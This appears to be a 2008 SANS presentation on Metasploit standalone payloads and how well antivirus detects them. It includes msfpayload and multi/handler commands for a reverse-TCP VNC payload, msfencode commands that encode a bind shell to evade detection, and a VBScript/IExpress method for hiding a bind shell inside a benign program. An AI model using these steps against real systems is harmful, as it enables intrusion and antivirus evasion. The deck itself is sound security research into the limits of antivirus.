Add to collection(s) Add to saved
  1. Engineering & Technology
  2. Computer Science

Metasploit Payloads and Antivirus Mark Baggett December 2008

advertisement 
Metasploit Payloads and
Antivirus
Mark Baggett
December 2008
GIAC GSEC GCIH
SANS Technology Institute - Candidate for Master of Science Degree
1
1
Objectives
• Learn how an attacker might use
Metasploit standalone payloads
against you
• See how these payloads are
created, used and “trojanized”
• Understand what level of protection
to expect from your antivirus
SANS Technology Institute - Candidate for Master of Science Degree
2
How are they used against you?
• Can be executed by tricking a user into
running the payload or via an exploit that is
not in the framework
• Execute a payload on a fully patched system
• Use Meterpreter’s advanced functionality such
as anti-forensics, detection evasion, and
pivoting
• Scenario:
– Attacker bruteforces password to a fully patched
machine
– Runs Meterpreter payload and uses it to pivot
– Uses framework to attack other hosts on DMZ
SANS Technology Institute - Candidate for Master of Science Degree
3
msfpayload
• Generates payloads in various formats
– Source code in C, Perl, Ruby, Java
– Hexadecimal (RAW)
– Binary executable formats for Win32;
Linux; OS X on Intel, PPC, iPhone
– Java automatically selects Big Endian or
Little Endian depending upon processor of
targeted payload
– You can override this with a simple
modification to msfpayload (js_be, js_le)
SANS Technology Institute - Candidate for Master of Science Degree
4
Demonstration
• See how these payloads are created
SANS Technology Institute - Candidate for Master of Science Degree
5
Interacting with payloads
• Some payloads will not work standalone
– find_port, find_tag
• Bind shell payloads can be used outside
of the framework
• Others require the use of the
multi/handler exploit
SANS Technology Institute - Candidate for Master of Science Degree
6
Using multi/handler
CREATION - LHOST is the attacker’s IP
./msfpayload \
windows/vncinjection/reverse_tcp \
LHOST=192.168.100.5 X > vncrev.exe
USE - RHOST is the victim’s IP
./msfcli exploit/multi/handler \
PAYLOAD=windows/vncinject/reverse_tcp \
RHOST=192.168.100.3 \
DisableCourtesyShell=TRUE E
SANS Technology Institute - Candidate for Master of Science Degree
7
Demonstration
•See how these payloads are used
SANS Technology Institute - Candidate for Master of Science Degree
8
msfencode
• Will encode a payload using one of
various algorithms
• Expects RAW msfpayload as input
• -h for help
• -l list of available encoders
• -e encoder to use
• -t output type
• -b characters to avoid
SANS Technology Institute - Candidate for Master of Science Degree
9
msfencode -> Binary
• Binary was not a selectable output type
from msfencode until Sept 29th 2008
• 3 ways to create a binary
– Add 3 lines of code to msfencode
– Generate RAW output and use a hex editor
to place it in a binary PE format
– Generate C source code and compile it
• -t exe option will encode a Windows
binary
SANS Technology Institute - Candidate for Master of Science Degree
10
msfencode (continued)
• ./msfpayload windows/shell_bind_tcp R |\
./msfencode -e x86/shikata_ga_nia -t exe
• ./msfpayload windows/shell_bind_tcp R |\
./msfencode -e x86/shikata_ga_nia –b\
“\x41\x42\x43” -t exe
• Text.to_win32pe() uses /data/templates
– Use your own binaries with “PAYLOAD:” tag
– To_win32pe chooses a random base relocation
address (4 bytes at position 0x88)
– Roll your own with template.c
SANS Technology Institute - Candidate for Master of Science Degree
11
Turning payloads into trojans
• IExpress is a setup utility that comes
with Windows XP
• Can create packages that visibly execute
a benign host program and invisibly
execute a malicious payload
• All you need is a small VBscript to
execute your payload invisibly
• Trojan payloads only temporarily avoid
antivirus
SANS Technology Institute - Candidate for Master of Science Degree
12
Payload script
• The script
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "mspaint.exe",1, False
Wshshell.Run "bindshell.exe",0, False
• Quick IExpress Demonstration
– See how these payloads are “trojanized”
SANS Technology Institute - Candidate for Master of Science Degree
13
Level of protection to expect
from your antivirus
• Expected results: Low rate of detection for unencoded
payloads and no detection for encoded payloads
• Actual results: No detection for unencoded payloads or
encoded payloads
• 2 products’ heuristics flagged payloads
• Pauldotcom Episode 125 at the end of September
2008 found 6 systems detected the payload
• My HIPS testing yielded disappointing results
• HD Moore has stated that version 3.2 will generate a
new Windows Binary that is harder to detect.
SANS Technology Institute - Candidate for Master of Science Degree
14
Summary
• Metasploit is a powerful framework with a diverse set
of tools
• Using these tools attackers can easily create
standalone payloads that run on fully patched
systems
• Antivirus products do not at this time provide
adequate protection against Metasploit payloads
• My paper is in the SANS reading room titled
“Effectiveness of Antivirus Detecting Metasploit
Payloads”
SANS Technology Institute - Candidate for Master of Science Degree
15
Related documents
Why is this class required?
Why is this class required?
Document14176757 14176757
Document14176757 14176757
Payloads
Payloads
Ageing poems
Ageing poems
Download
advertisement